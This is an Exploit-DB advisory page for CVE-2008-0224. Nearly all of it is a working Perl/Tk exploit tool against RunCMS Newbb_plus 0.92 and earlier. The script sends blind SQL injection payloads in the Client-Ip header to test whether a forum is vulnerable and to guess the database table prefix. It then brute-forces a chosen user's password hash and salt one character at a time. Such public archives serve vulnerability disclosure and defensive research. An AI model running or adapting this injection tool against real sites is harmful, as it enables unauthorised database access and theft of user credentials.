RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit

2008-01-06T00:00:00
ID EDB-ID:4845
Type exploitdb
Reporter Eugene Minaev
Modified 2008-01-06T00:00:00

Description

RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit. CVE-2008-0224. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

	use Tk;
	use Tk::BrowseEntry;
	use Tk::DialogBox;
	use LWP::UserAgent;

	$mw = new MainWindow(title =&gt; "UnderWHAT?!" );

	$mw-&gt;geometry ( '420x383' ) ;
	$mw-&gt;resizable(0,0);

	$mw-&gt;Label(-text =&gt; '', -font =&gt; '{Verdana} 8',-foreground=&gt;'red')-&gt;pack();
	$mw-&gt;Label(-text =&gt; 'Newbb_plus &lt;= 0.92 Client Ip Sql Injection', -font =&gt; '{Tahoma} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$mw-&gt;Label(-text =&gt; 'it will take about half an hour to get hashed password', -font =&gt; '{Tahoma} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$mw-&gt;Label(-text =&gt; 'you need magic_quotes_gpc turned off and mysql version higher that 4.1', -font =&gt; '{Tahoma} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$mw-&gt;Label(-text =&gt; '', -font =&gt; '{Tahoma} 7 bold',-foreground=&gt;'red')-&gt;pack();


	$fleft  = $mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'ne') ;
	$fright = $mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'nw') ;

	$url      = 'http://test2.ru/runcms/modules/newbb_plus/';
	$user_id  = '1';
	$prefix   = 'run_';
	$table    = 'users';
	$column   = 'user_password';
	$report   = '';
	$group    = 1;
	$curr_user = 0;
	


	$fleft-&gt;Label ( -text =&gt; 'Path to forum index: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$url) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	$fleft-&gt;Label ( -text =&gt; 'User ID: ', -font =&gt; '{Verdana} 8 bold' ) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$user_id) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	$fleft-&gt;Label ( -text =&gt; 'Database tables prefix: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$prefix) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	$fleft-&gt;Label ( -text =&gt; 'Returned hash: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$report) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	$fleft-&gt;Label ( -text =&gt; 'Returned salt: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$salt) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();

	$fright-&gt;Button(-text    =&gt; 'Test forum vulnerability',
	                -relief =&gt; "groove",
	                -width =&gt; '30',
	                -font =&gt; '{Verdana} 8 bold',
	                -activeforeground =&gt; 'red',
	                -command =&gt; \&test_vuln
	               )-&gt;pack();

	$fright-&gt;Button(-text    =&gt; 'Get database tables prefix',
	                -relief =&gt; "groove",
	                -width =&gt; '30',
	                -font =&gt; '{Verdana} 8 bold',
	                -activeforeground =&gt; 'red',
	                -command =&gt; \&get_prefix
	               )-&gt;pack();
	
	$fright-&gt;Button(-text    =&gt; 'Get hash from database',
	                -relief =&gt; "groove",
	                -width =&gt; '30',
	                -font =&gt; '{Verdana} 8 bold',
	                -activeforeground =&gt; 'red',
	                -command =&gt; \&get_hash
	               )-&gt;pack();
				   
	$fright-&gt;Button(-text    =&gt; 'Get salt from database',
	                -relief =&gt; "groove",
	                -width =&gt; '30',
	                -font =&gt; '{Verdana} 8 bold',
	                -activeforeground =&gt; 'red',
	                -command =&gt; \&get_salt
	               )-&gt;pack();
				   
	$mw   -&gt;Label(-text =&gt; '', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$fleft-&gt;Label(-text =&gt; '!', -font =&gt; '{Webdings} 22')-&gt;pack();
	$fleft-&gt;Label(-text =&gt; 'Newbb_plus 0.92', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$fleft-&gt;Label(-text =&gt; 'client ip sql injection ', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$fleft-&gt;Label(-text =&gt; 'mysql char bruteforcing ', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$fleft-&gt;Label(-text =&gt; 'bug in replace function ', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$fleft-&gt;Label(-text =&gt; 'by gemaglabin and Elekt  ', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$fleft-&gt;Label(-text =&gt; '( mafia of antichat.ru ) ', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$fleft-&gt;Label(-text =&gt; ' 2007.02.04 ( fixed ) ', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$fright-&gt;Label(-text =&gt; '', -font =&gt; '{Verdana} 3 bold',-foreground=&gt;'red')-&gt;pack();
	$print=$fright-&gt;Text(-width=&gt;35,-height=&gt;5,-wrap=&gt;"word")-&gt;pack(-side=&gt;"top",-anchor=&gt;"s");
	
	MainLoop();
	
	sub get_hash()
	{
		srand();
		$xpl = LWP::UserAgent-&gt;new( ) or die;
		$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'get hash from database', -buttons =&gt; ["OK"]);
		$i = 1;
		$b = 0;
		$report = '';
		$type = get_type();
		if ($type == 0) {$len = 40;}
		if ($type == 1) {$len = 32;}
		my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
		$print-&gt;insert('end',"- Start [$hour:$min:$sec]\n");
		my @brutearray=qw(48 49 50 51 52 53 54 55 56 57 58 97 98 99 100 101 102);
		while (length($report)&lt;$len)
		{
			$num = $brutearray[$b];
			$ret = get_pchar();
			if($ret &gt; 0)
			{
				$print-&gt;insert('end',"- char [$num] = ".chr($num)."\n");
				$report .= chr($num);
				$b = 0;
				$i = $i +1;
				$mw-&gt;update(); 
				break;
			}
			else
			{
				$b = $b +1;
			}
		}
		my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
		$print-&gt;insert('end',"- Finish [$hour:$min:$sec]");
	}
	
	sub get_salt()
	{
		srand();
		$xpl = LWP::UserAgent-&gt;new( ) or die;
		$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'get salt from database', -buttons =&gt; ["OK"]);
		$i = 1;
		$b = 0;
		$salt = '';
		my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
		$print-&gt;insert('end',"- Start [$hour:$min:$sec]\n");
		my @brutearray=qw(33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126);
		while (length($salt)&lt;4)
		{
			$num = $brutearray[$b];
			$ret = get_schar();
			if($ret &gt; 0)
			{
				$print-&gt;insert('end',"- char [$num] = ".chr($num)."\n");
				$salt .= chr($num);
				$b = 0;
				$i = $i +1;
				$mw-&gt;update(); 
				break;
			}
			else
			{
				$b = $b +1;
			}
		}
		my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
		$print-&gt;insert('end',"- Finish [$hour:$min:$sec]");
	}
	
	sub get_pchar()
	{
		$res = $xpl-&gt;get($url,'Client-Ip'=&gt;"123' or 1=if(ascii(substring((select pass from ".$prefix."users where uid=$user_id),$i,1))=$num,0,(select 1 union select 5))/*");
		if($res-&gt;as_string =~ /DELETE FROM/i) { return 0;}
		if($res-&gt;as_string =~ /INSERT INTO/i) { return 1;}
	}
	
	sub get_type()
	{
		$res = $xpl-&gt;get($url,'Client-Ip'=&gt;"123' or 1=if(ascii(substring((select pwdsalt from ".$prefix."users where uid=$user_id),1,1))=0,0,(select 1 union select 5))/*");
		if($res-&gt;as_string =~ /DELETE FROM/i) { return 0;}
		if($res-&gt;as_string =~ /INSERT INTO/i) { return 1;}
	}
	
	sub get_schar()
	{
		$res = $xpl-&gt;get($url,'Client-Ip'=&gt;"123' or 1=if(ascii(substring((select pwdsalt from ".$prefix."users where uid=$user_id),$i,1))=$num,0,(select 1 union select 5))/*");
		if($res-&gt;as_string =~ /DELETE FROM/i) { return 0;}
		if($res-&gt;as_string =~ /INSERT INTO/i) { return 1;}
	}
	
	 
	sub test_vuln()
	{
		$xpl = LWP::UserAgent-&gt;new( ) or die;
		$res = $xpl-&gt;get($url,'Client-Ip'=&gt;"123' or 1=if(ascii(1)=49,0,(select 1 union select 5))/*");
		if($res-&gt;is_success) 
		{
			$rep = '';
			if($res-&gt;as_string =~ /INSERT/i || $res-&gt;as_string =~ /DELETE/i) 
			{ 
				if($res-&gt;as_string =~ /INSERT/i)
				{$print-&gt;insert('end',"- FORUM VULNERABLE\n");}
				else { $print-&gt;insert('end',"- FORUM IS EMPTY\n");}
			}
			else { $print-&gt;insert('end',"- FORUM UNVULNERABLE\n");} 
		}
	}

	sub get_prefix()
	{
		$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'get database tables prefix', -buttons =&gt; ["OK"]);
		$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
		$InfoWindow-&gt;add('Label', -text =&gt; $url, -font =&gt; '{Verdana} 8')-&gt;pack;
		$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
		$xpl = LWP::UserAgent-&gt;new( ) or die;
		$res = $xpl-&gt;get($url,'Client-Ip'=&gt;"' union 1=1/*");
		if($res-&gt;is_success) 
		{
			$rep = '';
			if($res-&gt;as_string =~ /FROM (.*)bbplus/) { $prefix = $1; $InfoWindow-&gt;add('Label', -text =&gt; 'Prefix: '.$prefix, -font =&gt; '{Verdana} 8 bold')-&gt;pack; }
			else { $InfoWindow-&gt;add('Label', -text =&gt; 'Can\'t get prefix', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; } 
		}
		else
		{
			$InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack;
			$InfoWindow-&gt;add('Label', -text =&gt; $res-&gt;status_line, -font =&gt; '{Verdana} 8')-&gt;pack;
		} 
		$InfoWindow-&gt;Show();
		$InfoWindow-&gt;destroy;   
	}

# milw0rm.com [2008-01-06]